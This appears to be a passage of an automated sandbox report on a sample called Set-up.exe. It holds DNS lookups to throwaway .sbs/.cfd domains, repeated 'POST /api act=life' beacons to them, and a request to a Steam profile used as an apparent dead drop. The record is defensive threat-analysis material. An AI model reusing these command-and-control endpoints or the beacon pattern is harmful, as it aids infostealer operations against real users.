                                                                                        Oct 13, 2024 11:42:23.747909069 CEST49747443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:23.747957945 CEST49747443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:23.748022079 CEST44349747104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:24.345737934 CEST44349747104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:24.345976114 CEST44349747104.21.53.8192.168.2.4
                                                                                        Oct 13, 2024 11:42:24.346180916 CEST49747443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:24.346180916 CEST49747443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:24.346182108 CEST49747443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:24.660465956 CEST49747443192.168.2.4104.21.53.8
                                                                                        Oct 13, 2024 11:42:24.660530090 CEST44349747104.21.53.8192.168.2.4
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 13, 2024 11:42:12.753678083 CEST5027653192.168.2.41.1.1.1
                                                                                        Oct 13, 2024 11:42:12.773340940 CEST53502761.1.1.1192.168.2.4
                                                                                        Oct 13, 2024 11:42:13.808578968 CEST5851853192.168.2.41.1.1.1
                                                                                        Oct 13, 2024 11:42:13.819078922 CEST53585181.1.1.1192.168.2.4
                                                                                        Oct 13, 2024 11:42:14.762852907 CEST5398853192.168.2.41.1.1.1
                                                                                        Oct 13, 2024 11:42:14.771998882 CEST53539881.1.1.1192.168.2.4
                                                                                        Oct 13, 2024 11:42:14.795219898 CEST5028953192.168.2.41.1.1.1
                                                                                        Oct 13, 2024 11:42:14.809382915 CEST53502891.1.1.1192.168.2.4
                                                                                        Oct 13, 2024 11:42:15.834870100 CEST6324253192.168.2.41.1.1.1
                                                                                        Oct 13, 2024 11:42:15.849775076 CEST53632421.1.1.1192.168.2.4
                                                                                        Oct 13, 2024 11:42:16.813606977 CEST6392653192.168.2.41.1.1.1
                                                                                        Oct 13, 2024 11:42:16.825871944 CEST53639261.1.1.1192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.026732922 CEST5542153192.168.2.41.1.1.1
                                                                                        Oct 13, 2024 11:42:18.040107012 CEST53554211.1.1.1192.168.2.4
                                                                                        Oct 13, 2024 11:42:18.960890055 CEST6373453192.168.2.41.1.1.1
                                                                                        Oct 13, 2024 11:42:18.979465961 CEST53637341.1.1.1192.168.2.4
                                                                                        Oct 13, 2024 11:42:19.899655104 CEST4950153192.168.2.41.1.1.1
                                                                                        Oct 13, 2024 11:42:19.913213968 CEST53495011.1.1.1192.168.2.4
                                                                                        Oct 13, 2024 11:42:20.876852989 CEST5640353192.168.2.41.1.1.1
                                                                                        Oct 13, 2024 11:42:20.884628057 CEST53564031.1.1.1192.168.2.4
                                                                                        Oct 13, 2024 11:42:22.311084986 CEST6234153192.168.2.41.1.1.1
                                                                                        Oct 13, 2024 11:42:22.321085930 CEST53623411.1.1.1192.168.2.4
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Oct 13, 2024 11:42:12.753678083 CEST192.168.2.41.1.1.10x9a73Standard query (0)sippymroat.cfdA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:13.808578968 CEST192.168.2.41.1.1.10x86e4Standard query (0)mathcucom.sbsA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:14.762852907 CEST192.168.2.41.1.1.10x2f86Standard query (0)allocatinow.sbsA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:14.795219898 CEST192.168.2.41.1.1.10xcc4Standard query (0)enlargkiw.sbsA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:15.834870100 CEST192.168.2.41.1.1.10x1868Standard query (0)resinedyw.sbsA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:16.813606977 CEST192.168.2.41.1.1.10x3008Standard query (0)vennurviot.sbsA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:18.026732922 CEST192.168.2.41.1.1.10x563cStandard query (0)ehticsprocw.sbsA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:18.960890055 CEST192.168.2.41.1.1.10xe65aStandard query (0)condifendteu.sbsA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:19.899655104 CEST192.168.2.41.1.1.10x3e70Standard query (0)drawwyobstacw.sbsA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:20.876852989 CEST192.168.2.41.1.1.10xde34Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:22.311084986 CEST192.168.2.41.1.1.10xb5e6Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Oct 13, 2024 11:42:12.773340940 CEST1.1.1.1192.168.2.40x9a73No error (0)sippymroat.cfd188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:12.773340940 CEST1.1.1.1192.168.2.40x9a73No error (0)sippymroat.cfd188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:13.819078922 CEST1.1.1.1192.168.2.40x86e4No error (0)mathcucom.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:13.819078922 CEST1.1.1.1192.168.2.40x86e4No error (0)mathcucom.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:14.771998882 CEST1.1.1.1192.168.2.40x2f86Name error (3)allocatinow.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:14.809382915 CEST1.1.1.1192.168.2.40xcc4No error (0)enlargkiw.sbs172.67.152.13A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:14.809382915 CEST1.1.1.1192.168.2.40xcc4No error (0)enlargkiw.sbs104.21.33.249A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:15.849775076 CEST1.1.1.1192.168.2.40x1868No error (0)resinedyw.sbs104.21.77.78A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:15.849775076 CEST1.1.1.1192.168.2.40x1868No error (0)resinedyw.sbs172.67.205.156A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:16.825871944 CEST1.1.1.1192.168.2.40x3008No error (0)vennurviot.sbs172.67.140.193A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:16.825871944 CEST1.1.1.1192.168.2.40x3008No error (0)vennurviot.sbs104.21.46.170A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:18.040107012 CEST1.1.1.1192.168.2.40x563cNo error (0)ehticsprocw.sbs104.21.30.221A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:18.040107012 CEST1.1.1.1192.168.2.40x563cNo error (0)ehticsprocw.sbs172.67.173.224A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:18.979465961 CEST1.1.1.1192.168.2.40xe65aNo error (0)condifendteu.sbs172.67.141.136A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:18.979465961 CEST1.1.1.1192.168.2.40xe65aNo error (0)condifendteu.sbs104.21.79.35A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:19.913213968 CEST1.1.1.1192.168.2.40x3e70No error (0)drawwyobstacw.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:19.913213968 CEST1.1.1.1192.168.2.40x3e70No error (0)drawwyobstacw.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:20.884628057 CEST1.1.1.1192.168.2.40xde34No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:22.321085930 CEST1.1.1.1192.168.2.40xb5e6No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                                        Oct 13, 2024 11:42:22.321085930 CEST1.1.1.1192.168.2.40xb5e6No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                        • sippymroat.cfd
                                                                                        • mathcucom.sbs
                                                                                        • enlargkiw.sbs
                                                                                        • resinedyw.sbs
                                                                                        • vennurviot.sbs
                                                                                        • ehticsprocw.sbs
                                                                                        • condifendteu.sbs
                                                                                        • drawwyobstacw.sbs
                                                                                        • steamcommunity.com
                                                                                        • sergei-esenin.com
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449731188.114.97.34431012C:\Users\user\Desktop\Set-up.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 09:42:13 UTC261OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: sippymroat.cfd
                                                                                        2024-10-13 09:42:13 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-10-13 09:42:13 UTC821INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 09:42:13 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=04dcnsjaopkv169ee6eke0qedq; expires=Thu, 06 Feb 2025 03:28:52 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nmOjOaRXcXXUWYmsC6ebRMPtOo2Jp4RQyynnDYLLqMbkC5UmwEk72IJUzrcVBV4FMZZBk2N%2F3vjFPRPAMmqySWYm27JqxA%2FbvUh4PqnK16HvVLBFlr4n1bl6QigmvpxsBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d1e60ddce254295-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 09:42:13 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                        Data Ascii: aerror #D12
                                                                                        2024-10-13 09:42:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449732188.114.96.34431012C:\Users\user\Desktop\Set-up.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 09:42:14 UTC260OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: mathcucom.sbs
                                                                                        2024-10-13 09:42:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-10-13 09:42:14 UTC817INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 09:42:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=n2mo4vee0smmdq23cgam5ms22c; expires=Thu, 06 Feb 2025 03:28:53 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DT5D0PzeAdBS%2BezR0oZIRdhBPkjGwVvcR79UKdKqzHqKZTNcTQh0WD6u04vL4BeyOC9kW05lP%2By3AB6%2BaPzuY2mj3QWTcXxtRwiDJZMd4EXxTa0kn%2FT5eX5qMYP2url4"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d1e60e3f833186d-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 09:42:14 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                        Data Ascii: aerror #D12
                                                                                        2024-10-13 09:42:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.449733172.67.152.134431012C:\Users\user\Desktop\Set-up.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 09:42:15 UTC260OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: enlargkiw.sbs
                                                                                        2024-10-13 09:42:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-10-13 09:42:15 UTC815INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 09:42:15 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=g1kfpfdn7ms947ie8h0pukol84; expires=Thu, 06 Feb 2025 03:28:54 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mp1yqCa48sn5CXG2%2F6VFiP9O7V%2B8ccHHgTEFHKtvqUWnevSR8JenwgA91Hs7v83FGoNduMFddynjI4Ymg21xc65pbSl8WWCtoFUgONRg2dKUfzAxwzHQ%2FGuk70tSCjdo"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d1e60ea1e578ca1-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 09:42:15 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                        Data Ascii: aerror #D12
                                                                                        2024-10-13 09:42:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449734104.21.77.784431012C:\Users\user\Desktop\Set-up.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 09:42:16 UTC260OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: resinedyw.sbs
                                                                                        2024-10-13 09:42:16 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-10-13 09:42:16 UTC813INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 09:42:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=q3havsfihggekrnhuv7lut88b3; expires=Thu, 06 Feb 2025 03:28:55 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XgrJXrzzisiDNkBJDTTNy0vCPtC8dkytug210Gz9xTUotyjd0rEAsAYH9hMgs0AYGtrjkA9885B%2BIovcmGVGzKjNQ9SHyhpues0nOb05Xx5%2BLI5ShqQH9I6421D9xykG"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d1e60f07e5442c4-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 09:42:16 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                        Data Ascii: aerror #D12
                                                                                        2024-10-13 09:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.449735172.67.140.1934431012C:\Users\user\Desktop\Set-up.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 09:42:17 UTC261OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: vennurviot.sbs
                                                                                        2024-10-13 09:42:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-10-13 09:42:17 UTC819INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 09:42:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=imqen4sn7kcqst60ngo2nritus; expires=Thu, 06 Feb 2025 03:28:56 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WvfbProCgEPqveLcpGQm6UVNM%2BhTyRGrAhNbeGDxhtmhv4kmS4AOUxGlXXRwc648ohQt7gsBzVXCnui9fUPowOQaGpEwOl3nic5wT20P6rNlJ4CwnTkJ0ab1LkoDybqe3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d1e60f84df28c9b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 09:42:17 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                        Data Ascii: aerror #D12
                                                                                        2024-10-13 09:42:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.449737104.21.30.2214431012C:\Users\user\Desktop\Set-up.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 09:42:18 UTC262OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: ehticsprocw.sbs
                                                                                        2024-10-13 09:42:18 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-10-13 09:42:18 UTC831INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 09:42:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=smfqi94d6qbu36na6q1m648d0d; expires=Thu, 06 Feb 2025 03:28:57 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nmD%2B5XfnouPEMok%2BuuaY%2FuPq4Mj4Fqeu6sf0q64Z10Z6gH%2F4V30s2UmjL6Sfxk2Ts8GBoIEW%2F%2Fuq%2BMHWDxFcFvjJQRxxuEtzmDv5p4J7l%2Borej2qDj3SUsZTeYkoAWNeHeA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d1e60fe381c4259-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 09:42:18 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                        Data Ascii: aerror #D12
                                                                                        2024-10-13 09:42:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.449741172.67.141.1364431012C:\Users\user\Desktop\Set-up.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 09:42:19 UTC263OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: condifendteu.sbs
                                                                                        2024-10-13 09:42:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-10-13 09:42:19 UTC817INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 09:42:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=hlitpme5vvs0d7ols4vuccb0c9; expires=Thu, 06 Feb 2025 03:28:58 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=stKaRUzRf2hgXZKmTKUjWe6lpexiAg7A7yf3hNsLs1M%2FMfEHMB67QvcOwtSa3av21TRZ5Z8g4y5xkwguw0burtD2LXWnU8bzQsCcpx8MATuP0rCszhVlFq%2B1f4ukwACPPtiP"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d1e61041e48de96-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 09:42:19 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                        Data Ascii: aerror #D12
                                                                                        2024-10-13 09:42:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.449743188.114.96.34431012C:\Users\user\Desktop\Set-up.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 09:42:20 UTC264OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: drawwyobstacw.sbs
                                                                                        2024-10-13 09:42:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-10-13 09:42:20 UTC827INHTTP/1.1 200 OK
                                                                                        Date: Sun, 13 Oct 2024 09:42:20 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=bt2qkpqge1c1kvtfv6vnungpom; expires=Thu, 06 Feb 2025 03:28:59 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZTBnNKXFeklJNAH6tKKJ0%2FRO8q0ZRssaOHnc4Y%2F6hnkBrUrA9HiAHhraXv3uW2Z%2Bxf1UuxB8zyGphmZpqiByp3KvSlUcVz7chKA8sVNeLeOdbkCqYki0SRbDuKT7EaQNnyNT9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d1e610a2ac91a0b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-10-13 09:42:20 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                        Data Ascii: aerror #D12
                                                                                        2024-10-13 09:42:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.449745104.102.49.2544431012C:\Users\user\Desktop\Set-up.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-13 09:42:21 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Host: steamcommunity.com
                                                                                        2024-10-13 09:42:22 UTC1870INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                        Cache-Control: no-cache
                                                                                        Date: Sun, 13 Oct 2024 09:42:22 GMT
                                                                                        Content-Length: 34837
                                                                                        Connection: close
                                                                                        Set-Cookie: sessionid=3842f22e652dc505c877dc1a; Path=/; Secure; SameSite=None
                                                                                        Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
